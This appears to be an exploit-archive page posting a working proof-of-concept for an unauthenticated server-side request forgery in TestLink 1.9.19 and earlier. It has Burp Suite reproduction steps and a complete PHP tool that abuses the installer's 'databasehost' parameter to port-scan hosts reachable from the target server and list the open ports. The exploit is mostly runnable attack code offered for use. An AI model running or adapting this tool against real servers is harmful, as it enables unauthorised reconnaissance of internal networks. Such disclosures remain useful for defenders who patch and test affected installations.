what you don't know can hurt you

TestLink 1.9.19 Server-Side Request Forgery

TestLink 1.9.19 Server-Side Request Forgery
Posted Jun 3, 2019
Authored by Manish Tanwar

TestLink versions 1.9.19 and below suffers from a server side request forgery vulnerability.

tags | exploit
MD5 | 671a64f681314d0d390da608a907ce79

TestLink 1.9.19 Server-Side Request Forgery

Change Mirror Download
##################################################################################################
#Exploit Title : TestLink (version <= 1.9.19) Server Side Request Forgery
#Author : Manish Kishan Tanwar AKA error1046
#Vendor Link : http://testlink.org
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

/////////////////////////
//Vulnerability OverView
/////////////////////////

TestLink (version <= 1.9.19) is vulnerable to Un-Autheticated Server-Side Request Forgery (SSRF) which allow an attacker to perform Network device Port
scanning. Device may be the same which is hosting Testlink code or it may be connected to the same network.
This issue exists in script "install/installNewDB.php" and affected parameter is "databasehost".


Steps to Reproduce:
===================
1. Configure your web browser with any proxy software (i am using Burp Suite).
2. Access below mentioned URL in web browser and click "Continue" button:
http://localhost/testlink-1.9.19/install/installCheck.php?licenseOK=on
3. Turn on Burp Interception.
4. Now, in web browser, fill relevant information in input fields (Database admin login/Password etc) and click "Process TestLink Setup" button.
5. In Burp proxy, send the intercepted request to Burp Repeater tab by pressing "CTRL+R" key combination.
6. Switch to Burp Repeater tab and change the value of HTTP Post Parameter "databasehost" from "localhost" to "localhost:22" (if your machine is Linux and SSH running on it), click "Go" button in Burp Repeater.
7. Application response will appear in Burp repeater response tab, which will beshowing that "MySQL server has gone away".
8. Now, change the value of "databasehost" from "localhost:22" to "localhost:1337", click "Go" button in Burp Repeater.
9. Application will respond with HTTP response having SQL server error message "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond".

//////////////////////////
//Exploit code starts here
//////////////////////////

<?php
set_time_limit(0);
/*coded by Manish Kishan Tanwar @indishell lab (http://mannulinux.org) */

$head = '

<html>

<head>

<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>

</script>

<title>--==[[Indishell forever]]==--</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<STYLE>

body {
background: url("https://raw.githubusercontent.com/incredibleindishell/sqlite-lab/master/images/head.jpg");
background-size: 100% 700px;

font-family: Tahoma;

color: white;



}


input {

border : solid 2px ;

border-color : black;

BACKGROUND-COLOR: #444444;

font: 8pt Verdana;


color: white;

}


submit {

BORDER: buttonhighlight 2px outset;

BACKGROUND-COLOR: Black;

width: 30%;

color: #FFF;

}


#t input[type=\'submit\']{

COLOR: White;

border:none;

BACKGROUND-COLOR: black;

}


#t input[type=\'submit\']:hover {



BACKGROUND-COLOR: #ff9933;

color: black;



}

tr {

BORDER: dashed 1px #333;

color: #FFF;

}

td {

BORDER: dashed 0px ;

}

.table1 {

BORDER: 0px Black;

BACKGROUND-COLOR: Black;

color: #FFF;

}

.td1 {

BORDER: 0px;

BORDER-COLOR: #333333;

font: 7pt Verdana;

color: Green;

}

.tr1 {

BORDER: 0px;

BORDER-COLOR: #333333;

color: #FFF;

}

table {

BORDER: dashed 2px #333;

BORDER-COLOR: #333333;

BACKGROUND-COLOR: #191919;;

color: #FFF;

}

textarea {

border : dashed 2px #333;

BACKGROUND-COLOR: Black;

font: Fixedsys bold;

color: #999;

}

A:link {

border: 1px;

COLOR: red; TEXT-DECORATION: none

}

A:visited {

COLOR: red; TEXT-DECORATION: none

}

A:hover {

color: White; TEXT-DECORATION: none

}

A:active {

color: white; TEXT-DECORATION: none

}

</STYLE>

<script type="text/javascript">

<!--

function lhook(id) {

var e = document.getElementById(id);

if(e.style.display == \'block\')

e.style.display = \'none\';

else

e.style.display = \'block\';

}

//-->

</script>

';




echo $head ;

echo '


<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >





<td width="100%" align=center valign="top" rowspan="1">

<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ TestLink </font><font color=white size=5 face="comic sans ms"><b>SSRF </font><font color=green size=5 face="comic sans ms"><b> Exploit POC]]==--</font><br>
<font color=#ff9933 size=3 face="comic sans ms"><b>--==[[ With </font><font color=white size=3 face="comic sans ms"><b>Love From IndiShell</font><font color=green size=3 face="comic sans ms"><b> Crew]]==--</font>
<div class="hedr">


<td height="10" align="left" class="td1"></td></tr><tr><td

width="100%" align="center" valign="top" rowspan="1"><font

color="red" face="comic sans ms"size="1"><b>

<font color=#ff9933>

##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>

-==[[Greetz to]]==--</font><br> <font color=#ff9933>zero cool, code breaker ica, root_devil, google_warrior,INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, cyber warrior, Anurag, Hacker Fantastic and rest of TEAM INDISHELL<br>

<font color=white>--==[[Love to]]==--</font><br># My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Jagriti, Hardeep Singh, Ashu bhai ji, Rafay Baloch, Soldier Of God, Shafoon, Rehan Manzoor, almas malik, Bhuppi, Mohit, Ffe ^_^, Govind Singh, Shardhanand, Budhaoo, Don(Deepika kaushik) and D3 <br>



<b>

<font color=#ff9933>

##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>



</table>

</table> <br>


';

?>
<div align=center>
<table width="60%" cellspacing="0" cellpadding="0" class="tb1" style="border: 0px; background-color: transparent; ">
<tr><td width="80%" align=center style="padding: 10px; background-color: #191919; opacity: 0.6;">

<form method="POST" >
Target URL: <input style="width: 200px;" type=text name=url value="http://target/testlink_base_dir/">
<br><br>
Ports to be scan: <input type=text name=ports value="21,445,1433,3389">

&nbsp &nbsp
Host to be scan: <input type=text name=host value="Host or IP">

</td></tr><tr>
<td width="40%" align=center style="padding: 10px;">
<input type="submit" value="Billu, Spread the magic" name="own_it"/></form>
</td></tr></table>


<?php

function bas_jugad($lu,$host,$p0rt,$timeout)
{

$payload="isNew=1&databasetype=mysql&databasehost=$host:$p0rt&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload");
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$result = curl_exec ($ch);
curl_close ($ch);


return $result;

}



if(isset($_POST['own_it']))
{
$url_auth=trim($_POST['url']).'/install/installNewDB.php';
$list=$_POST['ports'];
$h0st=trim($_POST['host']);

///////////////////////////////
///Check if host is up or not
///////////////////////////////
$test_port = '31337';
$t_out='100';


$check = bas_jugad($url_auth,$h0st,$test_port,$t_out);
//print_r(strstr($check,'php_network_getaddresses'));


if(!(strstr($check,'php_network_getaddresses'))=='')

{

echo "<script>alert('Target is unreachable, Get me something working :|');</script><br>";

die();
}

////////////////////////////
///Time to get back to work
///////////////////////////

else
{

echo "<script>alert('Target is reachable, I am rolling out =)) ');</script><br>";



if(!(strstr($list,","))=='')
{

$all_ports=array();
$ch = array();
$content = array();
$open = array();
$closed = array();

$all_ports=explode(',',$list);
$n_time='5';

$t1 = microtime(true);
$mh = curl_multi_init();

$i = 0;

foreach($all_ports as $port)

{

$payload="isNew=1&databasetype=mysql&databasehost=$h0st:$port&databasename=testlink3&tableprefix=box3&databaseloginname=indishell&databaseloginpassword=tost&tl_loginname=root&tl_loginpassword=";

$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, $url_auth);
curl_setopt($ch[$i], CURLOPT_HEADER, 0);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 5);
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch[$i], CURLOPT_POST, 1);
curl_setopt($ch[$i], CURLOPT_POSTFIELDS, $payload);

curl_multi_add_handle($mh, $ch[$i]);
$i ++;
}

$active = null;
do
{
$mrc = curl_multi_exec($mh, $active);
usleep(200000); // limit requests for a while
} while ($active);



$i = 0;
foreach ($ch AS $i => $c)
{
$content[$i] = curl_multi_getcontent($c);
curl_multi_remove_handle($mh, $c);
}

curl_multi_close($mh);

for($j=0;$j < count($content);$j++)
{

if(!(strstr($content[$j],'refused'))=='')
{
// echo "Port $all_ports[$j] is closed<br>";

}

else
{
//echo "port $all_ports[$j] is open 8-)<br>";
array_push($open,$all_ports[$j]);
}



}

echo '<table width="50%" cellspacing="0" cellpadding="0" class="tb1" >
<tr><td align=center style="padding: 10px; background-color: black; opacity: 0.9;"><font color=#ff9933>--==[[ Open Ports on Target server '.$h0st.' ]]==--</font></td></tr>';

foreach($open as $in_open)

{

echo '<tr><td align=center style="padding: 3px; background-color: black; opacity: 0.9;"><font color="white">Port '.$in_open.'</font></td></tr>';

}
echo '</table>';



}
else
{

}
}




}

echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">Developed By 1046 at <font color=#ff9933>IndiShell Lab</font>";

?>

/////////////////////
//Exploit code end
/////////////////////

--==[[ Greetz To ]]==--

Guru ji zero, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba,
Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad,
Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256
Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, Bikash Dash

--==[[Love to]]==--

My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP
Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    13 Files
  • 28
    May 28th
    18 Files
  • 29
    May 29th
    17 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close